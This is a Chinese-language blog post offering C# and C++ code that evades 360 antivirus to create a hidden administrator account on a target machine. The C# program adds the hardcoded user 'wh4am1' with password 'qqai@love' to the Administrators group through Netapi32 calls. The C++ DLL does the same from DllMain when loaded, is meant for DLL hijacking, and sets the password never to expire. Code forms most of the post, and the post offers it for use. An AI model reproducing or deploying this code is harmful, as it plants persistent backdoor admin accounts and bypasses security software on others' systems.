发布:2024/1/23 17:42:42作者:管理员 来源:本站 浏览次数:602
今天在群里看到一位大佬发的绕过360安全卫士添加系统用户权限的脚本,于是乎,我便下载下来分析可知是通过调用系统 API 函数来规避杀软:
所以我就蹭一波热度,自己写了个 C# 版本的, Class 类如下:
using System;
using System.Runtime.InteropServices;
namespace Bypass360
{
public class LocalGroupUserHelper
{
[DllImport("Netapi32.dll")]
extern static int NetUserAdd([MarshalAs(UnmanagedType.LPWStr)] string servername, int level, ref USER_INFO_1 buf, int parm_err);
[DllImport("Netapi32.dll")]
extern static int NetLocalGroupAddMembers([MarshalAs(UnmanagedType.LPWStr)] string servername, [MarshalAs(UnmanagedType.LPWStr)] string groupname,
int level, ref LOCALGROUP_MEMBERS_INFO_3 buf, int totalentries);
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct LOCALGROUP_MEMBERS_INFO_3
{
public string domainandname; // //lgrmi3_domainandname
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct USER_INFO_1
{
public string usri1_name;
public string usri1_password;
public int usri1_password_age;
public int usri1_priv;
public string usri1_home_dir;
public string comment;
public int usri1_flags;
public string usri1_script_path;
}
///
/// 添加一个用户,添加失败后返回非0 。
///
/// 机器名称,如果是本机,请设置为null
///
///
///
public void AddUser(string serverName, string userName, string password, string strComment)
{
USER_INFO_1 NewUser = new USER_INFO_1(); //创建一个USER_INFO_1实例
NewUser.usri1_name = userName; // Allocates the username
NewUser.usri1_password = password; // allocates the password
NewUser.usri1_priv = 1; // Sets the account type to USER_PRIV_USER
NewUser.usri1_home_dir = null; // We didn't supply a Home Directory
NewUser.comment = strComment; // Comment on the User
NewUser.usri1_script_path = null; // We didn't supply a Logon Script Path
if (NetUserAdd(serverName, 1, ref NewUser, 0) != 0) //添加失败后返回非0
{
Console.WriteLine("Error Adding User");
}
}
///
/// 在本地组中添加一个用户成员,添加失败后返回非0 。
///
/// 机器名称,如果是本机,请设置为null
///
///
public void GroupAddMembers(string serverName, string groupName, string userName)
{
LOCALGROUP_MEMBERS_INFO_3 NewMember = new LOCALGROUP_MEMBERS_INFO_3();
NewMember.domainandname = userName;
if (NetLocalGroupAddMembers(serverName, groupName, 3, ref NewMember, 1) != 0) //添加失败后返回非0
{
Console.WriteLine("Error Adding Group Member");
}
}
}
}
在 Class 类中定义了系统需要用到的 API 函数
- NetUserAdd
- NetLocalGroupAddMembers
Main 类如下:
using System;
using System.Runtime.InteropServices;
using Bypass360;
namespace Bypass360Add
{
public static class BypassUAC_csharp
{
[DllImport("kernel32.dll")]
static extern void ExitProcess(uint uExitCode);
public static void Main(string[] args)
{
LocalGroupUserHelper local = new LocalGroupUserHelper();
string username = "wh4am1";
string password = "qqai@love";
string groupname = "Administrators";
local.AddUser(null, username, password, null);
local.GroupAddMembers(null, groupname, username);
ExitProcess(1);
}
}
}
运行后会在目标机器上创建一个用户为 wh4am1 密码为 qqai@love 的 Administrators 组用户
当然,如果是想利用 Dll 劫持等方式来添加用户,我也提供上 C++ Dll 的代码
#include
#include
#include
#include
#pragma comment(lib,"netapi32.lib")
void StartExploitThread() {
USER_INFO_1 ui;
DWORD dwError = 0;
ui.usri1_name = (LPWSTR) L"wh4am1";
ui.usri1_password = (LPWSTR) L"qqai@love";
ui.usri1_priv = USER_PRIV_USER;
ui.usri1_home_dir = NULL;
ui.usri1_comment = (LPWSTR) "";
//UF_SCRIPT 登陆脚本执行,UF_DONT_EXPIRE_PASSWD 表示密码永不过期,
//UF_PASSWD_CANT_CHANGE 用户不能更改密码
ui.usri1_flags = UF_SCRIPT | UF_DONT_EXPIRE_PASSWD | UF_PASSWD_CANT_CHANGE;
ui.usri1_script_path = NULL;
NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError);
LOCALGROUP_MEMBERS_INFO_3 account;
account.lgrmi3_domainandname = (LPWSTR)L"wh4am1";
NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
StartExploitThread();
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
成功效果如下:
